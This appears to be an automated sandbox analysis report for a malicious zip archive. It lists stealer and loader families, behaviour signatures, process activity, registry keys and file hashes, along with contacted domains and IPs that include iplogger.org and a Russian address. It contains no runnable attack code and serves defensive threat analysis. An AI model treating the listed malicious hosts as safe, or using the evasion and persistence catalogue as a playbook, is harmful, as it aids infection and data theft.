Analysis Overview
SHA256
75d167249768d3b15728389b25c65e97f6ad92610b26b7d65fe8e2db83c41e4d
Threat Level: Known bad
The file 241108-b33b7svmcm_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Vidar family
RedLine payload
Onlylogger family
Socelars family
Socelars payload
Glupteba payload
FFDroider
SectopRAT
Smokeloader family
Socelars
FFDroider payload
Vidar
Gcleaner family
SectopRAT payload
Metasploit family
Detect Fabookie payload
RedLine
Modifies firewall policy service
Ffdroider family
SmokeLoader
Windows security bypass
GCleaner
Lgoogloader family
Detects LgoogLoader payload
Redline family
LgoogLoader
Glupteba family
Sectoprat family
MetaSploit
Fabookie family
OnlyLogger
Glupteba
OnlyLogger payload
Modifies boot configuration data using bcdedit
Vidar Stealer
Manipulates Digital Signatures
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Drops file in Drivers directory
Boot or Logon Autostart Execution: Active Setup
Event Triggered Execution: Component Object Model Hijacking
Windows security modification
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Deletes itself
Reads user/profile data of web browsers
Drops Chrome extension
Adds Run key to start application
Looks up geolocation information via web service
Legitimate hosting services abused for malware hosting/C2
Manipulates WinMonFS driver.
Manipulates WinMon driver.
Network Share Discovery
Checks whether UAC is enabled
Enumerates connected drives
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in System32 directory
AutoIT Executable
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
System Location Discovery: System Language Discovery
Modifies data under HKEY_USERS
Checks processor information in registry
Modifies system certificate store
Suspicious behavior: RenamesItself
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Suspicious use of SendNotifyMessage
Kills process with taskkill
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Modifies registry class
Suspicious behavior: EnumeratesProcesses
GoLang User-Agent
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies Internet Explorer settings
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-08 09:08
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie family
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
135s
Max time network
137s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-298ER.tmp\IDWCH2.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-298ER.tmp\IDWCH2.tmp | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-298ER.tmp\IDWCH2.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3476 wrote to memory of 3528 | N/A | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | C:\Users\Admin\AppData\Local\Temp\is-298ER.tmp\IDWCH2.tmp |
| PID 3476 wrote to memory of 3528 | N/A | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | C:\Users\Admin\AppData\Local\Temp\is-298ER.tmp\IDWCH2.tmp |
| PID 3476 wrote to memory of 3528 | N/A | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | C:\Users\Admin\AppData\Local\Temp\is-298ER.tmp\IDWCH2.tmp |
Processes
C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe
"C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe"
C:\Users\Admin\AppData\Local\Temp\is-298ER.tmp\IDWCH2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-298ER.tmp\IDWCH2.tmp" /SL5="$60258,506127,422400,C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | the-flash-man.com | udp |
| US | 8.8.8.8:53 | best-link-app.com | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
memory/3476-2-0x0000000000401000-0x000000000040B000-memory.dmp
memory/3476-0-0x0000000000400000-0x000000000046D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-298ER.tmp\IDWCH2.tmp
| MD5 | 6020849fbca45bc0c69d4d4a0f4b62e7 |
| SHA1 | 5be83881ec871c4b90b4bf6bb75ab8d50dbfefe9 |
| SHA256 | c6c796f0d37e1a80632a295122db834499017b8d07728e0b5dfa6325ed3cab98 |
| SHA512 | f4c359a9ebf362b943d10772efe9cfd0a0153c1ff866ffdf1223e16e544dfa2250f67e7a7682d2558761d36efe15c7de1a2c311bc67b162eb77394ef179924eb |
memory/3528-6-0x0000000000400000-0x0000000000516000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-E48PR.tmp\idp.dll
| MD5 | 8f995688085bced38ba7795f60a5e1d3 |
| SHA1 | 5b1ad67a149c05c50d6e388527af5c8a0af4343a |
| SHA256 | 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006 |
| SHA512 | 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35 |
memory/3528-18-0x0000000000400000-0x0000000000516000-memory.dmp
memory/3476-20-0x0000000000400000-0x000000000046D000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
SmokeLoader
Smokeloader family
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\justdezine.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\justdezine.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\justdezine.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\justdezine.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\justdezine.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\justdezine.exe
"C:\Users\Admin\AppData\Local\Temp\justdezine.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4276 -ip 4276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 352
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
memory/4276-2-0x0000000001ED0000-0x0000000001ED9000-memory.dmp
memory/4276-1-0x0000000001FA0000-0x00000000020A0000-memory.dmp
memory/4276-3-0x0000000000400000-0x0000000000408000-memory.dmp
memory/4276-6-0x0000000000400000-0x0000000000408000-memory.dmp
memory/4276-5-0x0000000001ED0000-0x0000000001ED9000-memory.dmp
memory/4276-4-0x0000000000400000-0x0000000001D6E000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Ffdroider family
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe
"C:\Users\Admin\AppData\Local\Temp\md3_3kvm.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 186.2.171.3:80 | 186.2.171.3 | tcp |
| RU | 186.2.171.3:443 | 186.2.171.3 | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.171.2.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
memory/1064-0-0x0000000000400000-0x000000000062C000-memory.dmp
memory/1064-1-0x00000000001C0000-0x00000000001C3000-memory.dmp
memory/1064-5-0x0000000000400000-0x000000000062C000-memory.dmp
memory/1064-9-0x0000000003180000-0x0000000003190000-memory.dmp
memory/1064-15-0x0000000003BD0000-0x0000000003BE0000-memory.dmp
memory/1064-22-0x0000000004670000-0x0000000004678000-memory.dmp
memory/1064-23-0x0000000004690000-0x0000000004698000-memory.dmp
memory/1064-25-0x0000000004730000-0x0000000004738000-memory.dmp
memory/1064-28-0x0000000004870000-0x0000000004878000-memory.dmp
memory/1064-29-0x0000000004890000-0x0000000004898000-memory.dmp
memory/1064-30-0x0000000004B40000-0x0000000004B48000-memory.dmp
memory/1064-31-0x0000000004A40000-0x0000000004A48000-memory.dmp
memory/1064-32-0x00000000048B0000-0x00000000048B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 9df2bc5da98321e0f45f2845a0f14440 |
| SHA1 | 74db5d55779c2a18b059a8984acf480268565605 |
| SHA256 | 0de2bf694e91b528b03f873788df3ec8ea4494d69b2098af9ac8400886c6e09e |
| SHA512 | 270e0e166379c26791ff96e131f5a6305ba42626f0eef608f52de28f959c4150efb6a51c50c21c2e841707883983c9b62603fd581cff255e0afa4883aa336be9 |
memory/1064-45-0x0000000004690000-0x0000000004698000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | f18e8f0d733787058d87715c80967ebd |
| SHA1 | e054374b2a731838c44621c5c695fd56e90f9ca6 |
| SHA256 | bf59d71eec1d2133db0b8d11db10624bb8e4f113d7387b34c6bd2eb461e1ea2e |
| SHA512 | 28105aa27478d97c522676c949241f258fa8c87e9a50feedfb411679d5be63977c63016e4837109bc061d8f01826f6e9073645875175ede7de0e6c40d7514abb |
memory/1064-53-0x00000000048B0000-0x00000000048B8000-memory.dmp
memory/1064-55-0x00000000049E0000-0x00000000049E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 15f28b847dc4fd05064cf94fb10b7ed3 |
| SHA1 | 11151a388fdad67f69fa321f398a779b52315fbb |
| SHA256 | 50b61ab501ee6fa7b74a6191a474e65c254cdf15eb0b10a526de2faf1130c84f |
| SHA512 | 948ab89e4612f3d406a00d02ea56a594d229d51bea3c434a3e62bc60c9e5d8f94dff50b82d6e7b62a4265f37031835d6f09c652a26d8f267b2f8d5717a16acc1 |
memory/1064-68-0x0000000004690000-0x0000000004698000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | e410a291a5689ab9238d0f2d761189da |
| SHA1 | 4a58810f94b33c24e88c0ec6b9a9b8b06f94c33e |
| SHA256 | e78440188b4b100dc0927e533577bd7d120564d7ab383178fae528a427433d6f |
| SHA512 | 2633051f9b04807a62820ec7f75d0c7db399236d75d95e8d819405d6b46b658babc1a81bbbd6ebf3c83b3d0564b51a41393d37af34c2db291a3f656606a80fc6 |
memory/1064-76-0x00000000049E0000-0x00000000049E8000-memory.dmp
memory/1064-78-0x00000000048B0000-0x00000000048B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 3868e59a2ad6d0e769c919b68307a864 |
| SHA1 | 6b9e08574d46dabc242a6097424de74b9c39a804 |
| SHA256 | c7e3a664c570eac14f727ae228d0af5d0f0ebfcbbc1f36f5b8ec7b04eadba1db |
| SHA512 | 7f4a86a16853be229bb953a485e7be60fd0b32a314317474ba5d943ea3f977bc8c438001562c14b8751428f4f92135ec0a6f1399ab510642c7bdb90302f10b45 |
C:\Users\Admin\AppData\Local\Temp\d
| MD5 | 5c8960c089198fe07c80b49dcb0b116a |
| SHA1 | 3dfc71ed5414f85610e46510d5ec21620667e8ec |
| SHA256 | 74be8abed9d197055ecd12ea1d6529de38e8a3b79ace976322160b1ca17da158 |
| SHA512 | 8c4abacf76cc636bbca78b5a78ebefd1748e0867305d57c8e7dccb796c119e7b99605249368fd338b7d5591421d69606daf2de2a3b9c9800552000c481b79d2a |
memory/1064-117-0x0000000004550000-0x0000000004558000-memory.dmp
memory/1064-118-0x0000000004570000-0x0000000004578000-memory.dmp
memory/1064-126-0x0000000004610000-0x0000000004618000-memory.dmp
memory/1064-129-0x0000000004610000-0x0000000004618000-memory.dmp
memory/1064-130-0x0000000004D90000-0x0000000004D98000-memory.dmp
memory/1064-131-0x0000000005040000-0x0000000005048000-memory.dmp
memory/1064-132-0x0000000004F40000-0x0000000004F48000-memory.dmp
memory/1064-133-0x0000000004DB0000-0x0000000004DB8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 0ff5661a9a6f074f26e351c60339aa6d |
| SHA1 | 1b474321ca9c5e53ad2cd0b58ae4399861a2fc37 |
| SHA256 | b2572ea72407e26c242639ade66c5b66acbd48be0179b9881bdfbbdc450a1338 |
| SHA512 | c88396729fb3136c547e7c22ebbc15d698c971e227107e5d38b25bb8257945c07be2a9760b8faeb6341fd50ec1d7bd7883b6b40fba1e811d5236adb71dbeba4d |
memory/1064-146-0x0000000004570000-0x0000000004578000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 695cfcb07c96a1a0d3bbe313549ae144 |
| SHA1 | efcefe9b2552fe4693cce9fdd9f6927ecb259497 |
| SHA256 | cb2108cded22c5f15f40c35ae10eb9dc8fdc21a2c6cd36795764fd2fe0148d20 |
| SHA512 | db45b257e6c8d12eac6e2f58b74a88ef54197791546601258f067e1457b5988e57976c99ed753ea46c7a57eb274ff06b881618bb3d06824ac724656c5aae4226 |
memory/1064-154-0x0000000004DB0000-0x0000000004DB8000-memory.dmp
memory/1064-156-0x0000000004EE0000-0x0000000004EE8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 0a5ed76f1e08fb2f06608e01ecfcc252 |
| SHA1 | d3c4cf2973ee6cc385a4db837d51650281ff00d1 |
| SHA256 | 9f235b5bad5838f11dcae3ab90face8cbef500447d3743694cb5ff0587818b07 |
| SHA512 | 8d5563d66580e9c9e28e099de4528785c982d59aa285773bac149a9c8b7f3349f281cdb9e38b3d1f3481dce17390ea8fa2a5c5b1aca4b1fe7503e070eab515e6 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 1f343cc581aee2dadfb578b9755441d8 |
| SHA1 | 25d2c95a43888517e08a297cf2f905979197a668 |
| SHA256 | af80559bc0f7411d28b7f28d0398fd1a088a7b2f69a0991cbe0402b03764db48 |
| SHA512 | 3a91e75de7627a092613b1c9331af139638e3c3334948a256b7168d5e55e278a605c257f24c3354f36f46755a08cde544bb0cf1752898e61b7a88f5a499038f9 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | fca8fb5a562f486496123e809d4e500e |
| SHA1 | b2b1a33736ee8c500c31e9745898bd2019ae2325 |
| SHA256 | 0a1d71c82a945ac58342747153d3c5746a40565b0a6c135e391a2e48083136df |
| SHA512 | c186be606129d8eb2bc49754c679015886924ba614b6d010d257197cb0da180987e90eba3e91733f915861c1976929e28e3df75d411aba6164b7c18a4992ac5b |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | e0d445b55d0e585ab2198a0d5d76a579 |
| SHA1 | 8a44e33ced036bf4b5332bfc5d2cf7b14864d4f0 |
| SHA256 | 55d4ccebdf6a4180651c3cb12e8f90e8ca14f787386289beeb8881e49aacf4f0 |
| SHA512 | 0f705d3560086bdea58628929a05a69c17e9b4bfab7207aef04a4a55586cdf0510130bbe9b527ce422746d5cfc65ba87addddce131e58abec4f14c4322438c49 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 07bc17ac73b011d9f40256e0fe4d2fa0 |
| SHA1 | 7b1498488ff8cedecf18f29caf8ba3e70043df45 |
| SHA256 | ea963b63d2fa924b09f28d6ab2710e0fec3be512fb21d10d362b3ff9ff55f409 |
| SHA512 | 3e221c2db9c19e75b0095bc5a2be0ea90778d8b1a5af884ea95fee83bbbaae6ffb28d85fe4f226794f2f594be97b0be0720b12afdd5993602a073ffde0f47578 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | c67f6a5ef72dc36dd5f4a0294bdbdc08 |
| SHA1 | 639c23c7acb5e8370378e796d2d1b0e732dd9be8 |
| SHA256 | 6651c580690fe81411a4a7ac92627404a4acc223fc0232b4905fdc6c9a487457 |
| SHA512 | 49eba8c443969562ed1c2631ab4f68c5cd948018410af34d0cbb4647e3243fd607ddfc141ad89f2f53725200f3848ea45b1adbccb2ecc95b7bcbf066ef5f7470 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 39bc62eb45cac930db21ae8a299f7793 |
| SHA1 | 1d8d75b0d258ea2d74115e068edc687bd80bf9dd |
| SHA256 | 7b7073f7ac744336e2fa00947144c82b70db85c5733ef1c3964cadeba8baf0b2 |
| SHA512 | ed78594a01add31e631113af106fa02fa18783656f6bf78069fbd9d118e05311941f18361b54f046b6ea8d0030282463aa9b7036341d253135a0f256e8e1126a |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | a531b2d66f007add68e32aa4d562c026 |
| SHA1 | 567a6bf8161adf82b840010a30219a18f015fc44 |
| SHA256 | bebb9934a50bd10d7ff1cd09d0239074c49263b09747f297ee8ff6bf44fd374b |
| SHA512 | 2d5dfa4c5a8011fa298de6e9ae17265619bc04ed36c8b54960fbbda396eaa5359e6e85b4ea71cd098d57b9f5175321f883410dfc095a5e9d4e0d84d19fac4fde |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | d0f5d2243e262affbb8ee8e18ac9ec90 |
| SHA1 | ecf82a11d2297c01326e2ba7e2347654101f6e97 |
| SHA256 | 5dc08b0adcad292b047bcb1c1c46722ed7965204c7e038f84303daf10ae07ca4 |
| SHA512 | 31398c4a0c32ec16a28c65c0778c1a7126a3c0ba75997c750057dc0efb18f6521de0c034c63d73d8b4aabb2077c584dd78a4c49a9ddd4cce60c0a1c21a026168 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | b73c03df83b560a93132a6ca43ba6359 |
| SHA1 | 845a1cba8651b37ec155ec79955f2370d909efae |
| SHA256 | f8e2b8cec53642ed71cd2173f98b9e66a1496c77d5a423d2da0efcea6dffcd88 |
| SHA512 | 22ba723542923a016f2191b09db8de09cabe8851dd8a744323426dbea35f63a8b10ec64518eeab1537edf5e67093b0351f1c1bee464cf52bb5fc6601bd1dfb2e |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | ec36fc5a206ff5daa30d3d63e9fdbb51 |
| SHA1 | a6d1ef52a24c0b7db9af4440c4d89e193eb91e43 |
| SHA256 | 0672001bcbf6740e8c77e4a9f6f31f74390a7a61eaf49d04c8c26908170fa531 |
| SHA512 | 6524df7f675a7d62e2fa1427edbab745fd777f1e5683860c66e8a72ceb49b6e571e0f061da4a68574108dbbefc0a194997ba8631d455f166a0e2a542a2d07d79 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | daeb06d29eed0d39f61f704d35bd79e5 |
| SHA1 | 7b00da039dd6952cbdb70d87909bd9425dbfdd7a |
| SHA256 | 1fd63942ecbaddfccf42a5e77c39646cd13861bd14e82f04b884abceaac9527f |
| SHA512 | 56b735e34e7965446752d9e94911f3728811ffaa020e3f5cbbebfc71acf602d242443997178baa0ec714512ba02c5e4df7af51b733f217ff79cead8bed17949d |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 6cb9170cabe366491d918b837401102d |
| SHA1 | 217876e7ab2a21d7c3f95f451ce05fc64826f3d1 |
| SHA256 | 994ada27fac9b49e83cbbb5c5c9ab2d43d9504a6a80d7e453761785f6a1805d1 |
| SHA512 | 53a1499ee579388caacafcd97e5fc14caeffb53f39e4cadc9bcfd00641f35086dc823c9c51dfbad88462ca3ba8af3d354220d1db5c25f37727460c7f912b66b5 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 6873da4b506bd7d63a607561c6a13f6d |
| SHA1 | 885cfd46a2ac682728cc9c34a26e528a913f4560 |
| SHA256 | ec091a249851245b2136309d9a79d0e39949893a0e0a81cee1c047c326d0a9a7 |
| SHA512 | 1ca96f5d134ffaffdc1e4210d0a62942cc54daed3ade4b8c09fcc6b19695d6697c5500c8c37e5b65552b06e724797fd7309be74aec2c63ef38d68e759575c3b3 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 14da33c528e52e52d88386ed8bf1599c |
| SHA1 | a787c45270651df0e725dede311d7058709c1426 |
| SHA256 | 7ceef7353fe68b28eca0cd5a5484ebcb8464ca89647f7dfb61df614491612a81 |
| SHA512 | b4f333520037468d2ec97313c072c157703f8d23c1ccce6bb6876263b1109cb8fac155940911e4673be511def607fa63a97c42e41b93f319228b78c1d0757470 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 52b3cb06b47219daa691dd9d94c64598 |
| SHA1 | 55ee8b14eeb8c8a83bceaa35c8fca4dfe3691da1 |
| SHA256 | 95446671e989795b734bff4a94af1b5adb9a5e92d3a1cd01c04c004f2543a307 |
| SHA512 | e8182908ba4fa3e0da420e9fa331fe00cdcf6cefb943d9f9eb4aff29578ccf79791ec8a2d4cc5543e44980bf6f007b519a1466b697ce3a5502e61e6377c675ed |
C:\Users\Admin\AppData\Local\Temp\d.INTEG.RAW
| MD5 | 0492b21158b7ae66377cf21c154dac4f |
| SHA1 | 0867a4b2792e58320d8efb08513265d12be26538 |
| SHA256 | fb2cbfad64f99f0dbffba88cff3ddfbbb66fa48ce78bbedb409fa8398d95b0d4 |
| SHA512 | 6fbb44883e1ff6b7cc6dd31888c32cb99ebdfe1f4962219e4f30a478790994ee2d3c61164c565832ec05f7f53d337b7005a86f8f49a51329de4b523d04b62503 |
C:\Users\Admin\AppData\Local\Temp\d.jfm
| MD5 | 3180d978c7c66187f9766830106977d1 |
| SHA1 | 0f9cc263b3be3cc41efd7ec907741249e8ff4e27 |
| SHA256 | eebd5c97c5086877c627cdcb8680b4e6254d6a920ad311a5f205fc432255ee61 |
| SHA512 | cbd6894ec9db4e239c94a918316ba6d8746c05569df9a8515ca51049814983703d81a17877ba4136fd741878406b639555e156c8e0b446b356d83ae254854156 |
memory/1064-508-0x0000000000400000-0x000000000062C000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
140s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe
"C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | eurovegas.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/2848-0-0x00007FFEE6C33000-0x00007FFEE6C35000-memory.dmp
memory/2848-1-0x0000000000090000-0x00000000000C4000-memory.dmp
memory/2848-2-0x0000000002220000-0x0000000002226000-memory.dmp
memory/2848-3-0x0000000002230000-0x0000000002256000-memory.dmp
memory/2848-4-0x0000000002250000-0x0000000002256000-memory.dmp
memory/2848-5-0x00007FFEE6C30000-0x00007FFEE76F1000-memory.dmp
